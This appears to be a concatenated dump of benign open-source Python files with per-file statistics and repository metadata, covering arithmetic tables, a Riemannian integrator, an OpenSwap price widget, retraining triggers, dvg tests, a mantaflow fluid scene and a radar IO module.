for i in range(1,b+1):
for j in range(1,a+1):
print(i*j, end=' ')
Seki_tab[i-1][j-1]=i*j #store the value
print() #new line
return Seki_tab
# Display the addition table
def tashizan(a,b):
Wa_tab=[[0 for i in range(a)] for j in range(b)]# array for the test
for i in range(1,b+1):
for j in range(1,a+1):
print(i+j, end=' ')
Wa_tab[i-1][j-1]=i+j #store the value
print() #new line
return Wa_tab
def main():
#command line argument 'a' -> addition table 'm' -> multipulication table
args = sys.argv[1]
if args == 'm':
#load numbers from command line
x=int(input('x: '))
y=int(input('y: '))
kakezan(x,y)
elif args == "a":
x=int(input('x: '))
y=int(input('y: '))
tashizan(x,y)
else:
print('Caution: argument is a or m') # exception handling
if __name__ == '__main__':
main()
| 27.355556
| 77
| 0.570268
| 201
| 1,231
| 3.422886
| 0.323383
| 0.081395
| 0.034884
| 0.063953
| 0.409884
| 0.409884
| 0.409884
| 0.409884
| 0.351744
| 0.351744
| 0
| 0.021591
| 0.285134
| 1,231
| 44
| 78
| 27.977273
| 0.760227
| 0.312754
| 0
| 0.322581
| 0
| 0
| 0.061669
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.032258
| 0
| 0.193548
| 0.16129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4f325d1a129d74b4f20d86d9a69e407bc823af
| 1,524
|
py
|
Python
|
iliad/integrators/states/riemannian_leapfrog_state.py
|
JamesBrofos/Iliad
|
2220e1e519f479e402072f80f4bc67e419842c4e
|
[
"MIT"
] | 1
|
2022-03-24T20:32:54.000Z
|
2022-03-24T20:32:54.000Z
|
iliad/integrators/states/riemannian_leapfrog_state.py
|
JamesBrofos/Iliad
|
2220e1e519f479e402072f80f4bc67e419842c4e
|
[
"MIT"
] | null | null | null |
iliad/integrators/states/riemannian_leapfrog_state.py
|
JamesBrofos/Iliad
|
2220e1e519f479e402072f80f4bc67e419842c4e
|
[
"MIT"
] | null | null | null |
from typing import Callable
import numpy as np
from iliad.integrators.states.lagrangian_leapfrog_state import LagrangianLeapfrogState
from iliad.integrators.fields import riemannian
from iliad.linalg import solve_psd
from odyssey.distribution import Distribution
class RiemannianLeapfrogState(LagrangianLeapfrogState):
"""The Riemannian leapfrog state uses the Fisher information matrix to provide
a position-dependent Riemannian metric. As such, computing the gradients of
the Hamiltonian requires higher derivatives of the metric, which vanish in
the Euclidean case.
"""
def __copy__(self):
state = RiemannianLeapfrogState(self.position.copy(), self.momentum.copy())
state.log_posterior = self.log_posterior.copy()
state.grad_log_posterior = self.grad_log_posterior.copy()
state.velocity = self.velocity.copy()
state.metric = self.metric.copy()
state.inv_metric = self.inv_metric.copy()
state.sqrtm_metric = self.sqrtm_metric.copy()
state.logdet_metric = self.logdet_metric.copy()
state.jac_metric = self.jac_metric.copy()
state.grad_logdet_metric = self.grad_logdet_metric.copy()
state.force = self.force.copy()
return state
def update(self, distr: Distribution):
super().update(distr)
self.velocity = riemannian.velocity(self.inv_metric, self.momentum)
self.force = riemannian.force(self.velocity, self.grad_log_posterior, self.jac_metric, self.grad_logdet_metric)
| 41.189189
| 119
| 0.740157
| 188
| 1,524
| 5.835106
| 0.340426
| 0.082042
| 0.082042
| 0.038286
| 0.047402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177165
| 1,524
| 36
| 120
| 42.333333
| 0.874801
| 0.161417
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.25
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee5342a6017572637126ba2afb48e284377203df
| 7,625
|
py
|
Python
|
gui/qt/openswap_priceinfo.py
|
ComputerCraftr/openswap
|
7de04aa80dab79bebe4b64483011dad70a48694c
|
[
"MIT"
] | 16
|
2018-11-05T13:19:02.000Z
|
2021-04-06T12:11:49.000Z
|
gui/qt/openswap_priceinfo.py
|
ComputerCraftr/openswap
|
7de04aa80dab79bebe4b64483011dad70a48694c
|
[
"MIT"
] | 9
|
2018-09-19T03:37:26.000Z
|
2019-04-17T21:58:27.000Z
|
gui/qt/openswap_priceinfo.py
|
ComputerCraftr/openswap
|
7de04aa80dab79bebe4b64483011dad70a48694c
|
[
"MIT"
] | 5
|
2018-11-05T13:19:02.000Z
|
2020-10-20T09:15:54.000Z
|
from functools import partial
import math
from electroncash.i18n import _
from electroncash.address import Address
import electroncash.web as web
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from .util import *
from .qrtextedit import ShowQRTextEdit
from electroncash import bchmessage
from electroncash import openswap
from electroncash.util import format_satoshis_plain_nofloat, get_satoshis_nofloat
from electroncash.openswap import cryptos, crypto_list_by_bytes, crypto_list_by_str
def invert(x):
""" Because python does not allow division by zero"""
try:
return 1./x
except ZeroDivisionError:
return math.copysign(math.inf, x)
class PriceInfoBox(QGroupBox):
# how many significant figures to use in price calculations
# cryptocurrency amounts always use full precision
price_sigfigs = 6
# Dialog for creating / editing / viewing OpenSwap offers
def __init__(self, parent, editable=True):
self.parent = parent
self.editable = bool(editable)
QGroupBox.__init__(self, _("Pricing"), parent=parent)
layout = QGridLayout(self)
layout.addWidget(QLabel(_("Want")), 1, 0)
hbox = QHBoxLayout()
layout.addLayout(hbox, 1, 1)
self.want_amount_e = QLineEdit()
self.want_amount_e.textEdited.connect(self.amount_edited)
hbox.addWidget(self.want_amount_e)
self.want_crypto_cb = QComboBox()
self.want_crypto_cb.addItems(crypto_list_by_str)
hbox.addWidget(self.want_crypto_cb)
self.want_price_cb = QCheckBox(_("by price"))
self.want_price_cb.clicked.connect(partial(self.clicked_byprice, 1))
hbox.addWidget(self.want_price_cb)
if not self.editable:
self.want_price_cb.setHidden(True)
self.want_crypto_cb.setDisabled(True)
hbox.addStretch(1)
layout.addWidget(QLabel(_('Give')), 2, 0)
hbox = QHBoxLayout()
layout.addLayout(hbox, 2, 1)
self.give_amount_e = QLineEdit()
self.give_amount_e.textEdited.connect(self.amount_edited)
hbox.addWidget(self.give_amount_e)
self.give_crypto_cb = QComboBox()
self.give_crypto_cb.addItems(crypto_list_by_str)
hbox.addWidget(self.give_crypto_cb)
self.give_price_cb = QCheckBox(_("by price"))
self.give_price_cb.clicked.connect(partial(self.clicked_byprice, 2))
hbox.addWidget(self.give_price_cb)
if not self.editable:
self.give_price_cb.setHidden(True)
self.give_crypto_cb.setDisabled(True)
hbox.addStretch(1)
layout.addWidget(QLabel(_('Price')), 3,0)
vbox = QVBoxLayout()
layout.addLayout(vbox, 3, 1)
hbox = QHBoxLayout()
vbox.addLayout(hbox)
hbox.addStretch(1)
self.price1_e = QLineEdit()
self.price1_e.textEdited.connect(partial(self.price_edited,1))
hbox.addWidget(self.price1_e)
self.price1_label = QLabel()
hbox.addWidget(self.price1_label)
hbox = QHBoxLayout()
vbox.addLayout(hbox)
hbox.addStretch(1)
self.price2_e = QLineEdit()
self.price2_e.textEdited.connect(partial(self.price_edited,2))
hbox.addWidget(self.price2_e)
self.price2_label = QLabel()
hbox.addWidget(self.price2_label)
self.primaryprice = self.price1_e
self.update_cryptos()
self.update_editable()
self.update_amounts()
self.want_crypto_cb.currentIndexChanged[int].connect(self.update_cryptos)
self.give_crypto_cb.currentIndexChanged[int].connect(self.update_cryptos)
def clicked_byprice(self, i, checked):
if not checked:
pass
elif i == 1:
self.give_price_cb.setChecked(False) # make sure other is unchecked
self.price1_e.setFocus(Qt.MouseFocusReason)
elif i == 2:
self.want_price_cb.setChecked(False) # make sure other is unchecked
self.price1_e.setFocus(Qt.MouseFocusReason)
self.update_amounts()
self.update_editable()
def format_price(self, p):
return '%.*g'%(self.price_sigfigs, p)
def amount_edited(self, s):
self.update_amounts()
def price_edited(self, n, s):
if n == 1:
self.primaryprice = self.price1_e
else:
self.primaryprice = self.price2_e
self.update_amounts()
def update_amounts(self,):
# Update the other two dependent amounts based on user-provided ones.
# This uses floats.
wbyprice = self.want_price_cb.isChecked()
gbyprice = self.give_price_cb.isChecked()
if wbyprice or gbyprice:
if self.primaryprice is self.price1_e:
try:
price = float(self.price1_e.text())
iprice = invert(price)
except:
self.price2_e.setText('')
price = None
else:
self.price2_e.setText(self.format_price(iprice))
else:
try:
iprice = float(self.price2_e.text())
price = invert(iprice)
except:
self.price1_e.setText('')
price = None
else:
self.price1_e.setText(self.format_price(price))
if wbyprice:
try:
a = price * 1e8 * float(self.give_amount_e.text())
self.want_amount_e.setText(format_satoshis_plain_nofloat(a))
except:
self.want_amount_e.setText('')
else:
try:
a = iprice * 1e8 * float(self.want_amount_e.text())
self.give_amount_e.setText(format_satoshis_plain_nofloat(a))
except:
self.give_amount_e.setText('')
else:
try:
wa = float(self.want_amount_e.text())
ga = float(self.give_amount_e.text())
except:
self.price1_e.setText('')
self.price2_e.setText('')
else:
self.price1_e.setText(self.format_price(wa*invert(ga)))
self.price2_e.setText(self.format_price(ga*invert(wa)))
def update_editable(self,):
""" Based on the state of 'by price' checkboxes, update read_only-ness
"""
if not self.editable:
self.give_amount_e.setReadOnly(True)
self.want_amount_e.setReadOnly(True)
self.price1_e.setReadOnly(True)
self.price2_e.setReadOnly(True)
elif self.give_price_cb.isChecked():
self.give_amount_e.setReadOnly(True)
self.want_amount_e.setReadOnly(False)
self.price1_e.setReadOnly(False)
self.price2_e.setReadOnly(False)
elif self.want_price_cb.isChecked():
self.give_amount_e.setReadOnly(False)
self.want_amount_e.setReadOnly(True)
self.price1_e.setReadOnly(False)
self.price2_e.setReadOnly(False)
else:
self.give_amount_e.setReadOnly(False)
self.want_amount_e.setReadOnly(False)
self.price1_e.setReadOnly(True)
self.price2_e.setReadOnly(True)
def update_cryptos(self,):
tick1 = self.want_crypto_cb.currentText()
tick2 = self.give_crypto_cb.currentText()
self.price1_label.setText(tick1 + '/' + tick2)
self.price2_label.setText(tick2 + '/' + tick1)
| 36.658654
| 83
| 0.617574
| 897
| 7,625
| 5.027871
| 0.188406
| 0.042572
| 0.041463
| 0.036585
| 0.503991
| 0.430377
| 0.368514
| 0.323725
| 0.255876
| 0.233259
| 0
| 0.014004
| 0.288262
| 7,625
| 207
| 84
| 36.835749
| 0.817026
| 0.056393
| 0
| 0.367816
| 0
| 0
| 0.005853
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051724
| false
| 0.005747
| 0.08046
| 0.005747
| 0.16092
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee54b64f9bc555511d62a6158fb2e8ffda3d1cc6
| 2,906
|
py
|
Python
|
commons/triggering_training/retraining_defect_type_triggering.py
|
jibby0/service-auto-analyzer
|
79a0dbf6650693a3559b484c51e97e6fac5cc3ba
|
[
"Apache-2.0"
] | null | null | null |
commons/triggering_training/retraining_defect_type_triggering.py
|
jibby0/service-auto-analyzer
|
79a0dbf6650693a3559b484c51e97e6fac5cc3ba
|
[
"Apache-2.0"
] | null | null | null |
commons/triggering_training/retraining_defect_type_triggering.py
|
jibby0/service-auto-analyzer
|
79a0dbf6650693a3559b484c51e97e6fac5cc3ba
|
[
"Apache-2.0"
] | null | null | null |
"""
* Copyright 2019 EPAM Systems
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
import logging
from commons.object_saving.object_saver import ObjectSaver
from commons.triggering_training import abstract_triggering_training
logger = logging.getLogger("analyzerApp.retraining_defect_type_triggering")
class RetrainingDefectTypeTriggering(abstract_triggering_training.AbstractTrainingTrigger):
def __init__(self, app_config, start_number=100, accumulated_difference=100):
self.object_saver = ObjectSaver(app_config)
self.start_number = start_number
self.accumulated_difference = accumulated_difference
def remove_triggering_info(self, train_info):
self.object_saver.remove_project_objects(
train_info["project_id"], ["defect_type_trigger_info"])
def get_triggering_info(self, train_info):
return self.object_saver.get_project_object(
train_info["project_id"], "defect_type_trigger_info", using_json=True)
def save_triggering_info(self, trigger_info, train_info):
self.object_saver.put_project_object(
trigger_info, train_info["project_id"],
"defect_type_trigger_info", using_json=True)
def clean_defect_type_triggering_info(self, train_info, num_logs_with_defect_types):
trigger_info = self.get_triggering_info(train_info)
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types"] = num_logs_with_defect_types
self.save_triggering_info(trigger_info, train_info)
def should_model_training_be_triggered(self, train_info):
trigger_info = self.get_triggering_info(train_info)
if "num_logs_with_defect_types" not in trigger_info:
trigger_info["num_logs_with_defect_types"] = 0
trigger_info["num_logs_with_defect_types"] += train_info["num_logs_with_defect_types"]
if "num_logs_with_defect_types_since_training" not in trigger_info:
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types_since_training"] += train_info["num_logs_with_defect_types"]
self.save_triggering_info(trigger_info, train_info)
return trigger_info["num_logs_with_defect_types"] >= self.start_number\
and trigger_info["num_logs_with_defect_types_since_training"] >= self.accumulated_difference
| 47.639344
| 109
| 0.770131
| 394
| 2,906
| 5.258883
| 0.296954
| 0.100869
| 0.074324
| 0.114865
| 0.461873
| 0.408301
| 0.395753
| 0.326737
| 0.253861
| 0.225386
| 0
| 0.006939
| 0.156917
| 2,906
| 60
| 110
| 48.433333
| 0.838776
| 0.19649
| 0
| 0.171429
| 0
| 0
| 0.22948
| 0.216588
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171429
| false
| 0
| 0.085714
| 0.028571
| 0.342857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee5de97647ec1a5a844d776fae68ad8d234a3b9c
| 2,790
|
py
|
Python
|
tests/test_dvg_util_funcs.py
|
tos-kamiya/dvg
|
eb2df7f4b9850543098003a07f565227cdbf11fa
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_dvg_util_funcs.py
|
tos-kamiya/dvg
|
eb2df7f4b9850543098003a07f565227cdbf11fa
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_dvg_util_funcs.py
|
tos-kamiya/dvg
|
eb2df7f4b9850543098003a07f565227cdbf11fa
|
[
"BSD-2-Clause"
] | null | null | null |
from typing import *
import unittest
import contextlib
import os
import sys
import tempfile
from dvg.dvg import prune_overlapped_paragraphs, expand_file_iter
@contextlib.contextmanager
def back_to_curdir():
curdir = os.getcwd()
try:
yield
finally:
os.chdir(curdir)
def touch(file_name: str):
with open(file_name, "w") as outp:
print("", end="", file=outp)
class DvgUtilFuncsTest(unittest.TestCase):
def test_prune_overlapped_paragraphs(self):
lines = ["a b", "c d", "e f", "b a"]
spps = [
(0.1, 4, (0, 2), lines),
(0.3, 4, (1, 3), lines),
(0.2, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[1]]
self.assertEqual(actual, expected)
spps = [
(0.3, 4, (0, 2), lines),
(0.2, 4, (1, 3), lines),
(0.1, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[0]]
self.assertEqual(actual, expected)
spps = [
(0.3, 4, (0, 2), lines),
(0.1, 4, (1, 3), lines),
(0.2, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[0], spps[2]]
self.assertEqual(actual, expected)
def test_expand_file_iter(self):
with tempfile.TemporaryDirectory() as tempdir:
with back_to_curdir():
os.chdir(tempdir)
file_a = os.path.join("a")
touch(file_a)
file_b = os.path.join("b")
touch(file_b)
os.mkdir("D")
file_Dc = os.path.join("D", "c")
touch(file_Dc)
file_list = list(expand_file_iter(["a"]))
self.assertSequenceEqual(file_list, ["a"])
file_list = list(expand_file_iter(["a", "b"]))
self.assertSequenceEqual(file_list, ["a", "b"])
file_list = list(expand_file_iter(["b", "D/c"]))
self.assertSequenceEqual(file_list, ["b", "D/c"])
file_list = list(expand_file_iter(["*"]))
self.assertSequenceEqual(sorted(file_list), sorted(["a", "b"]))
file_list = list(expand_file_iter(["**"]))
self.assertSequenceEqual(sorted(file_list), sorted(["a", "b", os.path.join("D", "c")]))
sys_stdin = sys.stdin
try:
sys.stdin = ["a", "D/c"]
file_list = list(expand_file_iter(["-"]))
self.assertSequenceEqual(file_list, ["a", "D/c"])
finally:
sys.stdin = sys_stdin
if __name__ == "__main__":
unittest.main()
| 28.469388
| 103
| 0.506093
| 325
| 2,790
| 4.153846
| 0.209231
| 0.071111
| 0.082963
| 0.08
| 0.493333
| 0.408889
| 0.408889
| 0.368889
| 0.348148
| 0.348148
| 0
| 0.026805
| 0.344803
| 2,790
| 97
| 104
| 28.762887
| 0.711707
| 0
| 0
| 0.22973
| 0
| 0
| 0.020789
| 0
| 0
| 0
| 0
| 0
| 0.121622
| 1
| 0.054054
| false
| 0
| 0.094595
| 0
| 0.162162
| 0.013514
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee6420717483b3976c5a090488575b8372f61f62
| 5,279
|
py
|
Python
|
scenes/flip06_obstacle.py
|
spockthegray/mantaflow
|
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
|
[
"Apache-2.0"
] | 158
|
2018-06-24T17:42:13.000Z
|
2022-03-12T13:29:43.000Z
|
scenes/flip06_obstacle.py
|
spockthegray/mantaflow
|
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
|
[
"Apache-2.0"
] | 5
|
2018-09-05T07:30:48.000Z
|
2020-07-01T08:56:28.000Z
|
scenes/flip06_obstacle.py
|
spockthegray/mantaflow
|
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
|
[
"Apache-2.0"
] | 35
|
2018-06-13T04:05:42.000Z
|
2022-03-29T16:55:24.000Z
|
#
# This FLIP example combines narrow band flip, 2nd order wall boundary conditions, and
# adaptive time stepping.
#
from manta import *
dim = 3
res = 64
#res = 124
gs = vec3(res,res,res)
if (dim==2):
gs.z=1
s = Solver(name='main', gridSize = gs, dim=dim)
narrowBand = 3
minParticles = pow(2,dim)
saveParts = False
frames = 200
# Adaptive time stepping
s.frameLength = 0.8 # length of one frame (in "world time")
s.cfl = 3.0 # maximal velocity per cell and timestep, 3 is fairly strict
s.timestep = s.frameLength
s.timestepMin = s.frameLength / 4. # time step range
s.timestepMax = s.frameLength * 4.
# prepare grids and particles
flags = s.create(FlagGrid)
phi = s.create(LevelsetGrid)
phiParts = s.create(LevelsetGrid)
phiObs = s.create(LevelsetGrid)
vel = s.create(MACGrid)
velOld = s.create(MACGrid)
velParts = s.create(MACGrid)
#mapWeights= s.create(MACGrid)
pressure = s.create(RealGrid)
fractions = s.create(MACGrid)
tmpVec3 = s.create(VecGrid)
pp = s.create(BasicParticleSystem)
pVel = pp.create(PdataVec3)
mesh = s.create(Mesh)
# acceleration data for particle nbs
pindex = s.create(ParticleIndexSystem)
gpi = s.create(IntGrid)
# scene setup
bWidth=1
flags.initDomain(boundaryWidth=bWidth, phiWalls=phiObs )
fluidVel = 0
fluidSetVel = 0
phi.setConst(999.)
# standing dam
fluidbox1 = Box( parent=s, p0=gs*vec3(0,0,0), p1=gs*vec3(1.0,0.3,1))
phi.join( fluidbox1.computeLevelset() )
fluidbox2 = Box( parent=s, p0=gs*vec3(0.1,0,0), p1=gs*vec3(0.2,0.75,1))
phi.join( fluidbox2.computeLevelset() )
if 1:
sphere = Sphere( parent=s , center=gs*vec3(0.66,0.3,0.5), radius=res*0.2)
phiObs.join( sphere.computeLevelset() )
#obsbox = Box( parent=s, p0=gs*vec3(0.4,0.2,0), p1=gs*vec3(0.7,0.4,1))
#obsbox = Box( parent=s, p0=gs*vec3(0.3,0.2,0), p1=gs*vec3(0.7,0.6,1))
#phiObs.join( obsbox.computeLevelset() )
flags.updateFromLevelset(phi)
phi.subtract( phiObs );
sampleLevelsetWithParticles( phi=phi, flags=flags, parts=pp, discretization=2, randomness=0.05 )
if fluidVel!=0:
# set initial velocity
fluidVel.applyToGrid( grid=vel , value=fluidSetVel )
mapGridToPartsVec3(source=vel, parts=pp, target=pVel )
# also sets boundary flags for phiObs
updateFractions( flags=flags, phiObs=phiObs, fractions=fractions, boundaryWidth=bWidth )
setObstacleFlags(flags=flags, phiObs=phiObs, fractions=fractions)
lastFrame = -1
if 1 and (GUI):
gui = Gui()
gui.show()
#gui.pause()
# save reference any grid, to automatically determine grid size
if saveParts:
pressure.save( 'ref_flipParts_0000.uni' );
#main loop
while s.frame < frames:
maxVel = vel.getMax()
s.adaptTimestep( maxVel )
mantaMsg('\nFrame %i, time-step size %f' % (s.frame, s.timestep))
# FLIP
pp.advectInGrid(flags=flags, vel=vel, integrationMode=IntRK4, deleteInObstacle=False, stopInObstacle=False )
pushOutofObs( parts=pp, flags=flags, phiObs=phiObs )
advectSemiLagrange(flags=flags, vel=vel, grid=phi, order=1) # first order is usually enough
advectSemiLagrange(flags=flags, vel=vel, grid=vel, order=2)
# create level set of particles
gridParticleIndex( parts=pp , flags=flags, indexSys=pindex, index=gpi )
unionParticleLevelset( pp, pindex, flags, gpi, phiParts )
# combine level set of particles with grid level set
phi.addConst(1.); # shrink slightly
phi.join( phiParts );
extrapolateLsSimple(phi=phi, distance=narrowBand+2, inside=True )
extrapolateLsSimple(phi=phi, distance=3 )
phi.setBoundNeumann(0) # make sure no particles are placed at outer boundary, warning - larger values can delete thin sheets at outer walls...
flags.updateFromLevelset(phi)
# combine particles velocities with advected grid velocities
mapPartsToMAC(vel=velParts, flags=flags, velOld=velOld, parts=pp, partVel=pVel, weight=tmpVec3)
extrapolateMACFromWeight( vel=velParts , distance=2, weight=tmpVec3 )
combineGridVel(vel=velParts, weight=tmpVec3 , combineVel=vel, phi=phi, narrowBand=(narrowBand-1), thresh=0)
velOld.copyFrom(vel)
# forces & pressure solve
addGravity(flags=flags, vel=vel, gravity=(0,-0.001,0))
extrapolateMACSimple( flags=flags, vel=vel , distance=2, intoObs=True )
setWallBcs(flags=flags, vel=vel, fractions=fractions, phiObs=phiObs)
solvePressure(flags=flags, vel=vel, pressure=pressure, phi=phi, fractions=fractions )
extrapolateMACSimple( flags=flags, vel=vel , distance=4, intoObs=True )
setWallBcs(flags=flags, vel=vel, fractions=fractions, phiObs=phiObs)
if (dim==3):
# mis-use phiParts as temp grid to close the mesh
phiParts.copyFrom(phi)
phiParts.setBound(0.5,0)
phiParts.createMesh(mesh)
# set source grids for resampling, used in adjustNumber!
pVel.setSource( vel, isMAC=True )
adjustNumber( parts=pp, vel=vel, flags=flags, minParticles=1*minParticles, maxParticles=2*minParticles, phi=phi, exclude=phiObs, narrowBand=narrowBand )
flipVelocityUpdate(vel=vel, velOld=velOld, flags=flags, parts=pp, partVel=pVel, flipRatio=0.97 )
s.step()
if (lastFrame!=s.frame):
# generate data for flip03_gen.py surface generation scene
if saveParts:
pp.save( 'flipParts_%04d.uni' % s.frame );
if 0 and (GUI):
gui.screenshot( 'flip06_%04d.png' % s.frame );
#s.printMemInfo()
lastFrame = s.frame;
| 32.99375
| 154
| 0.722675
| 746
| 5,279
| 5.107239
| 0.345845
| 0.044619
| 0.030709
| 0.037795
| 0.135171
| 0.129659
| 0.065617
| 0.055643
| 0.04252
| 0.035171
| 0
| 0.03337
| 0.148513
| 5,279
| 159
| 155
| 33.201258
| 0.814238
| 0.227505
| 0
| 0.061856
| 0
| 0
| 0.021777
| 0.005444
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010309
| 0
| 0.010309
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee646ecd75eb338880899b14fe5eafbb53b55cd1
| 38,214
|
py
|
Python
|
gewittergefahr/gg_io/myrorss_and_mrms_io.py
|
dopplerchase/GewitterGefahr
|
4415b08dd64f37eba5b1b9e8cc5aa9af24f96593
|
[
"MIT"
] | 26
|
2018-10-04T01:07:35.000Z
|
2022-01-29T08:49:32.000Z
|
gewittergefahr/gg_io/myrorss_and_mrms_io.py
|
liuximarcus/GewitterGefahr
|
d819874d616f98a25187bfd3091073a2e6d5279e
|
[
"MIT"
] | 4
|
2017-12-25T02:01:08.000Z
|
2018-12-19T01:54:21.000Z
|
gewittergefahr/gg_io/myrorss_and_mrms_io.py
|
liuximarcus/GewitterGefahr
|
d819874d616f98a25187bfd3091073a2e6d5279e
|
[
"MIT"
] | 11
|
2017-12-10T23:05:29.000Z
|
2022-01-29T08:49:33.000Z
|
"""IO methods for radar data from MYRORSS or MRMS.
MYRORSS = Multi-year Reanalysis of Remotely Sensed Storms
MRMS = Multi-radar Multi-sensor
"""
import os
import glob
import warnings
import numpy
import pandas
from netCDF4 import Dataset
from gewittergefahr.gg_io import netcdf_io
from gewittergefahr.gg_utils import number_rounding as rounder
from gewittergefahr.gg_utils import time_conversion
from gewittergefahr.gg_utils import time_periods
from gewittergefahr.gg_utils import longitude_conversion as lng_conversion
from gewittergefahr.gg_utils import grids
from gewittergefahr.gg_utils import radar_utils
from gewittergefahr.gg_utils import myrorss_and_mrms_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
NW_GRID_POINT_LAT_COLUMN_ORIG = 'Latitude'
NW_GRID_POINT_LNG_COLUMN_ORIG = 'Longitude'
LAT_SPACING_COLUMN_ORIG = 'LatGridSpacing'
LNG_SPACING_COLUMN_ORIG = 'LonGridSpacing'
NUM_LAT_COLUMN_ORIG = 'Lat'
NUM_LNG_COLUMN_ORIG = 'Lon'
NUM_PIXELS_COLUMN_ORIG = 'pixel'
HEIGHT_COLUMN_ORIG = 'Height'
UNIX_TIME_COLUMN_ORIG = 'Time'
FIELD_NAME_COLUMN_ORIG = 'TypeName'
SENTINEL_VALUE_COLUMNS_ORIG = ['MissingData', 'RangeFolded']
GRID_ROW_COLUMN = 'grid_row'
GRID_COLUMN_COLUMN = 'grid_column'
NUM_GRID_CELL_COLUMN = 'num_grid_cells'
GRID_ROW_COLUMN_ORIG = 'pixel_x'
GRID_COLUMN_COLUMN_ORIG = 'pixel_y'
NUM_GRID_CELL_COLUMN_ORIG = 'pixel_count'
TIME_FORMAT_SECONDS = '%Y%m%d-%H%M%S'
TIME_FORMAT_MINUTES = '%Y%m%d-%H%M'
TIME_FORMAT_FOR_LOG_MESSAGES = '%Y-%m-%d-%H%M%S'
TIME_FORMAT_SECONDS_REGEX = (
'[0-9][0-9][0-9][0-9][0-1][0-9][0-3][0-9]-[0-2][0-9][0-5][0-9][0-5][0-9]')
MINUTES_TO_SECONDS = 60
METRES_TO_KM = 1e-3
SENTINEL_TOLERANCE = 10.
LATLNG_MULTIPLE_DEG = 1e-4
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC = 240
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC = 180
ZIPPED_FILE_EXTENSION = '.gz'
UNZIPPED_FILE_EXTENSION = '.netcdf'
AZIMUTHAL_SHEAR_FIELD_NAMES = [
radar_utils.LOW_LEVEL_SHEAR_NAME, radar_utils.MID_LEVEL_SHEAR_NAME]
RADAR_FILE_NAMES_KEY = 'radar_file_name_matrix'
UNIQUE_TIMES_KEY = 'unique_times_unix_sec'
SPC_DATES_AT_UNIQUE_TIMES_KEY = 'spc_dates_at_unique_times_unix_sec'
FIELD_NAME_BY_PAIR_KEY = 'field_name_by_pair'
HEIGHT_BY_PAIR_KEY = 'height_by_pair_m_asl'
def _get_pathless_raw_file_pattern(unix_time_sec):
"""Generates glob pattern for pathless name of raw file.
This method rounds the time step to the nearest minute and allows the file
to be either zipped or unzipped.
The pattern generated by this method is meant for input to `glob.glob`.
This method is the "pattern" version of _get_pathless_raw_file_name.
:param unix_time_sec: Valid time.
:return: pathless_raw_file_pattern: Pathless glob pattern for raw file.
"""
return '{0:s}*{1:s}*'.format(
time_conversion.unix_sec_to_string(unix_time_sec, TIME_FORMAT_MINUTES),
UNZIPPED_FILE_EXTENSION
)
def _get_pathless_raw_file_name(unix_time_sec, zipped=True):
"""Generates pathless name for raw file.
:param unix_time_sec: Valid time.
